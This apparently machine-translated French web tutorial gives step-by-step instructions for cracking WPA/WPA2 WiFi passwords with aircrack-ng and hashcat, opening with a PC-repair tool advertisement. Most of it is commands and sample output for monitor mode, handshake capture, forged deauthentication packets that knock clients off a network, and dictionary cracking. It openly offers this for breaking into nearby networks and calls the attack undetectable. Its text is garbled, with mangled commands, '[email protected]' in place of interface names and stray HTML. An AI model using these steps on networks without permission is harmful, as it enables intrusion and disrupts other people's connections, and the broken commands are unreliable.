Comment craquer les mots de passe WiFi WPA/WPA2 via Hashcat Aircrack-ng

Trouvez et réparez automatiquement les erreurs de Windows grâce à l'outil de réparation de PC

Reimage est un excellent outil de réparation qui détecte et répare automatiquement différents problèmes du système d'exploitation Windows. Avoir cet outil protégera votre PC contre les codes malveillants, les défaillances matérielles et plusieurs autres bugs. En outre, cela vous permet également d'utiliser votre appareil au maximum de ses capacités et de ses performances.

  • Étape 1: Télécharger l'outil de réparation et d'optimisation des PC (Windows 11, 10, 8, 7, XP, Vista - Certifié Microsoft Gold).
  • Étape 2: Cliquez sur "Démarrer l'analyse" pour trouver les problèmes de registre de Windows qui pourraient être à l'origine des problèmes du PC.
  • Étape 3: Cliquez sur "Réparer tout" pour résoudre tous les problèmes.

Télécharger

Dans ce guide, nous allons vous expliquer comment vous pouvez pirater les réseaux WiFi à l’aide de deux des meilleurs outils de piratage sans fil qui sont sécurisés à l’aide d’un mot de passe faible. Nous détaillerons étape par étape comment vous pouvez pirater WPA2 en utilisant aircrack-ng et hashcat, bien que ce ne soit pas exhaustif. Ces informations seront suffisantes pour que les utilisateurs puissent tester la sécurité de leur réseau ou pénétrer dans celui qui est proche.

L’attaque décrite ci-dessous est entièrement passive et impossible à détecter à condition que le mot de passe qui a été craqué ne sera pas utilisé par vous. Pour accélérer le processus de reconnaissance et une attaque de désauthentification facultative peut être utilisée et vous pouvez en savoir plus à ce sujet jusqu’à la fin du guide

Si vous avez un peu de savoir-faire concernant ce processus, alors vous vous n’avez pas besoin de connaître les descriptions, passez simplement à la liste des commandes qui ont été utilisées en bas.

Remarque: gardez une chose à l’esprit que ce tutoriel est uniquement à des fins éducatives et ne doit pas être utilisé pour une activité illégale et l’auteur n’est pas responsable de tout type d’utilisation.

Les outils nécessaires

  • Assurez-vous que vous êtes à l’aise avec la ligne de commande Linux.
  • Assurez-vous que Kali Linux ou Kali NetHunter est installé.
  • Maintenant, assurez-vous d’avoir téléchargé et installé Aircrack-ng.
  • Le dernier outil dont vous avez besoin est hashcat.
  • John The Ripper est une excellente alternative si hashcat cesse de fonctionner pour vous.

Comment cracker des mots de passe WPA2 avec Aircrack-ng a nd Hashcat (Tutoriel)

Activer le mode moniteur dans votre adaptateur WiFi

Vous devez commencer par lister les interactions sans fil qui prennent en charge le mode moniteur avec:

Airmon-ng

Si aucune interface n’est répertoriée, alors cela signifie que votre carte sans fil ne prend pas en charge le mode moniteur. Nous pouvons supposer que le nom de l’interface sans fil est [email protected] assurez-vous d’utiliser le nom correct s’il diffère de celui-ci, puis nous allons placer l’interface en mode moniteur:

Airmon-ng start [email protected]

Après cela, vous devez exécuter iwconfig. Vous pourrez désormais voir un nouveau mode de surveillance répertorié comme m [email protected] ou [email protected] .

Trouvez votre cible

Vous devez commencer à écouter les trames 802.11 Beacon qui sont diffusées par les routeurs sans fil proches en utilisant l’interface de votre moniteur:

Airodump-ng [email protected]

Vous allez voir le résultat suivant:

CH 13] [Temps écoulé: 52 s] [2021–03–07 16:50

Balises BSSID PWR #Data, #/s CH MB ENC CIPHER AUTH ESSID

14:91:82 : F7: 52: EB-66 205 26 0 1 54e OPN belkin.2e8.guests

14: 91: 82: F7: 52: E8-64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8

14: 22: DB: 1A: DB: 64-81 44 7 0 1 54 WPA2 CCMP u0026 lt; longueur: 0 u0026 gt; </em >

14: 22: DB: 1A: DB: 66-83 48 0 0 1 54e. WPA2 CCMP PSK vous a sécurisé

9C: 5C: 8E: C9: AB: C0-81 19 0 0 3 54e WPA2 CCMP PSK vous a sécurisé

00: 23: 69: AD: AF: 94-82 350 4 0 1 54e WPA2 CCMP PSK SecuredVous êtes le meilleur

06: 26: BB: 75 : ED: 69-84 232 0 0 1 54e. WPA2 CCMP PSK HH2

78: 71: 9C: 99: 67: D0-82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2

9C: 34: 26: 9F: 2E: E8-85 40 0 ​​0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT

BC: EE: 7B: 8F: 48: 28-85 119 10 0 1 54e WPA2 CCMP PSK root

EC: 1A: 59: 36: AD: CA-86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca

Maintenant, nous allons déchiffrer le mot de passe de un réseau du nom de secureyou. Vous devez vous souvenir de l’adresse MAC BSSID ainsi que du numéro de canal (CH) tel qu’il est affiché par Airodump-ng car nous avons besoin des deux pour l’étape suivante.

LIRE:   Comment pirater des mots de passe WiFi en 2021 (Attaque PMKID/Kr00k mise à jour)

Comment capturer un Prise de contact à 4 voies dans les réseaux WiFi

Le WPA ou WPA2 utilise une prise de contact à 4 voies pour authentifier les appareils sur le réseau. Vous n’avez pas besoin de savoir ce que cela signifie, mais vous devez capturer l’une de ces poignées de main pour déchiffrer le mot de passe du réseau. Les poignées de main ont lieu lorsqu’un appareil se connecte au réseau, comme lorsque vos voisins rentrent chez eux, nous pouvons capturer cette poignée de main en dirigeant airmon-ng pour surveiller le trafic sur la cible en utilisant le canal ainsi que les valeurs bssid provenant de la dernière commande.

  • remplacez les valeurs-c et-bssid par les valeurs de votre réseau cible
  • -w spécifie le répertoire dans lequel nous allons enregistrer la capture des paquets
  • airodump-ng-c 3-bssid 9C: 5C: 8E: C9: AB: C0-w. lun0
  • CH 6] [écoulé: 1 min] [2020–03–7 13:09:16] </forte >
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
  • 9C: 5C: 8E: C9: AB: C0-47 0 140 0 0 6 54e WPA2 CCMP PSK DELL

Une fois que vous avez capturé la poignée de main, vous besoin de voir quelque chose comme {WPA handshake: bc: d3: c9: ef: d2: 67 il y a le coin supérieur droit de l’écran, juste à droite de l’heure actuelle.

Si vous vous sentez impatient et à l’aise en utilisant l’attaque active, vous pouvez alors forcer les appareils à se connecter au réseau cible pour se reconnecter en leur envoyant des paquets de désauthentification malveillants. Cela entraîne la capture d’une poignée de main à 4 voies.

Une fois la poignée de main capturée, vous devez appuyer sur ctrl-c pour quitter airodump-ng. Vous verrez un fichier .cap dans lequel vous avez dit à airodump-ng de sauvegarder la capture appelée-01.Cap. Nous allons utiliser ce fichier de capture pour déchiffrer le mot de passe du réseau. Nous allons renommer ce fichier pour refléter le nom du réseau que nous essayons de déchiffrer:

Mv ./-01.cap secureyou .cap

The Real Fun: Cracking the WPA2 Pin

La dernière étape consiste à cracker le mot de passe en utilisant la poignée de main capturée. Si vous avez accès à un GPU, il est fortement recommandé d’utiliser le hashcat pour le craquage de mot de passe. Nous avons créé un outil qui rend le hashcat très facile à utiliser connu sous le nom de naïve-hashcat.

Si vous n’avez pas accès au GPU, vous pouvez trouver de nombreux services de craquage de GPU qui peuvent être utilisés comme le GPUHASH.me ou OnlineHashCrack. Vous pouvez également utiliser le craquage du processeur avec Aircrack-ng. Cependant, si vous souhaitez gagner du temps et utiliser la majeure partie de votre GPU, vous devez overclocker votre GPU pour accélérer le forçage brutal.

LIRE:   Comment supprimer facilement Activer le filigrane Windows 10 en 2021

Gardez à l’esprit que les deux méthodes ci-dessous supposent un mot de passe généré par l’utilisateur. . De nombreux routeurs WPA ou WPA2 sont livrés avec une chaîne de mots de passe aléatoires de 12 caractères que la plupart des utilisateurs laissent inchangés. Nous vous recommandons d’utiliser les fichiers de dictionnaire de longueur WPA des listes de mots probables si vous souhaitez déchiffrer l’un de ces mots de passe.

Utiliser Naive-Hashcat pour faire la magie

Avant de déchiffrer le mot de passe en utilisant le naïve-hashcat, vous devez convertir le fichier .cap au format de fichier de hashcat équivalent .hccapx. Cela peut être fait très rapidement en téléchargeant le fichier .cap surhttps://hashcat.net/cap2hccapx ou en utilisant directement l’outil cap2hccapx.

Ensuite, vous devez le télécharger et l’exécuter dans hashcat:

# downloadgit clonehttps://github.com/brannondorsey/naive-hashcat

cd naive-hashcat

Téléchargez une liste de mots ou un grand fichier de dictionnaire:

Liste de mots de mots de passe pour pirater les mots de passe WiFi WPA2

Mode Hashcat pour WPA/WPA2 que vous devez définir:

2500 est le mode de hachage hashcat pour WPA/WPA2

HASH_FILE = secureyou.hccapx POT_FILE = secureyou.pot HASH_TYPE = 2500 ./naive-hashcat .sh

Le naïve-hashcat utilise différentes attaques comme la règle, la combinaison, le masque et le dictionnaire et peut prendre près de 10 jours pour s’exécuter contre les mots de passe de force moyenne. Le mot de passe piraté est enregistré dans hackme.pot, vous devez donc vérifier ce fichier périodiquement. Une fois que le mot de passe a été craqué, vous verrez quelque chose comme ceci comme le contenu de votre POT_FILE:

e30a5a57fc00211fc9f57a4491508cc3: 9c5c8ec9abc0: acd1b8dfd971: ASUS: secureyouhacking

Les deux derniers champs séparés par: sont respectivement le nom du réseau et le mot de passe.

Utilisation d’Aircrack-ng pour effectuer une attaque par dictionnaire

Aircrack-ng peut également être utilisé pour des attaques par dictionnaire qui sont basiques et exécutées sur votre CPU. Avant d’exécuter l’infraction, vous avez besoin d’une liste de mots. Nous vous recommandons d’utiliser le fameux fichier de dictionnaire rockyou.

Télécharger le fichier de liste de mots du dictionnaire RockYou

Gardez à l’esprit que si le mot de passe du réseau n’est pas dans la liste de mots, vous ne devez pas déchiffrer le mot de passe.

  • #-a2 spécifie WPA2,-b est le BSSID,-w est le fichier de mots
  • aircrack-ng-a2-b 9C: 5C: 8E: C9: AB: C0-w rockyou.txt hackme.cap

Vous devez voir un message KEY FOUND dans le terminal qui est suivi d’une version en texte brut du mot de passe réseau si le mot de passe est piraté.

  • Aircrack-ng 2.0
  • < [00:01:49] 111040 clés testées (102,73 k/s)
  • CLÉ TROUVÉE! [SecuredYou-test-environment]
  • Clé principale: A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 </em >
  • 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
  • < strong> Clé transitoire: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
  • 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
  • 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
  • 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
  • EAPOL HMAC: 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4

Exécution du De-Attaque d’authentification

L’attaque de désauthentification peut envoyer des paquets de désauthentification falsifiés de votre machine vers le client connecté au réseau que vous essayez de craquer. Les packages incluent de fausses adresses d’expéditeur qui apparaissent au client comme si elles avaient été envoyées à partir du point d’accès lui-même. A la réception de colis comme ces nombreux clients susceptibles de se déconnecter du réseau puis de se reconnecter immédiatement moyennant une poignée de main à 4 voies si vous écoutez avec airodump-ng.

LIRE:   Comment sécuriser votre compte Facebook contre les pirates (Guide FB 2021)

Vous pouvez utiliser airodump-ng pour surveiller un point d’accès spécifique (utilisant –c canal –bssid MAC) à moins que et jusqu’à ce que vous voyiez un client (STATION) connecté. Un client connecté ressemble presque à ceci, où est 64: BC: 0C: 48: 97: F7 le MAC du client.

  • CH 7] [Elapsed: 4 mins] [2020-03-08 20:24]
  • BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID </em >
  • 9C: 5C: 8E: C9: AB: C0-19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
  • BSSID STATION PWR Rate Lost Frames Prob
  • 9C: 5C: 8E: C9: AB: C0 64: BC: 0C: 48: 97: F7-37 1e-1e 4 6479 Dell

Vous devez maintenant quitter airodump-ng pour fonctionner et ouvrir un nouveau terminal. Nous allons utiliser une commande airplay-ng pour envoyer de faux paquets de désauthentification au client victime, ce qui l’oblige à se reconnecter au réseau et à prendre une poignée de main dans le processus, espérons-le.

  • < strong> -0 3 indique que nous aimerions envoyer 3 paquets de suppression. Augmentez ce nombre
  • au besoin avec le risque d’interrompre sensiblement l’activité du réseau client
  • -a est le MAC du point d’accès
  • -c est le MAC du client
  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: X0-c 64: DC: 3C: 48: 97: F7 mon0

Vous pouvez également diffuser des paquets de désactivation à tous les clients connectés dans un réseau sans fil à l’aide de la commande ci-dessous:

  • aireplay-ng-0 2-a 9C: 5C: 8E: C9: AB: C0 mon0

Dès que vous envoyez les paquets deauth , vous devez revenir au processus airodump-ng et s’il y a un peu de chance, vous pourrez voir quelque chose comme ça là-bas en haut à droite [WPA handshake: 9C: 6C: 9E: D7: 8G: C0. Maintenant que la poignée de main a été capturée, vous êtes prêt à déchiffrer le mot de passe du réseau.

Version vidéo du didacticiel

Si vous êtes quelqu’un qui apprend en regardant quelqu’un d’autre le faire, voici une version vidéo pour vous.

Piratage de mots de passe sans fil WPA2 à l’aide d’Aircrack-ng/Hashcat

< strong> Autres outils de piratage sans fil que vous pouvez utiliser:

  • Téléchargement gratuit de Kismet-WiFi Sniffer
  • Téléchargement de Reaver WPS Pin Cracker
  • 15 Meilleurs outils de piratage et de sécurité gratuits à télécharger.

Derniers mots

Clause de non-responsabilité: Ceci est juste un simulation de la façon dont quelqu’un peut déchiffrer des mots de passe WPA2 à l’aide d’outils tels que Hashcat et Aircrack-ng. Ce type d’activité ne doit être effectué que dans un environnement contrôlé où l’autorisation est donnée. Cependant, j’espère que vous avez apprécié ce didacticiel complet et que vous en avez tiré le meilleur parti.

adminguides

Laisser un commentaire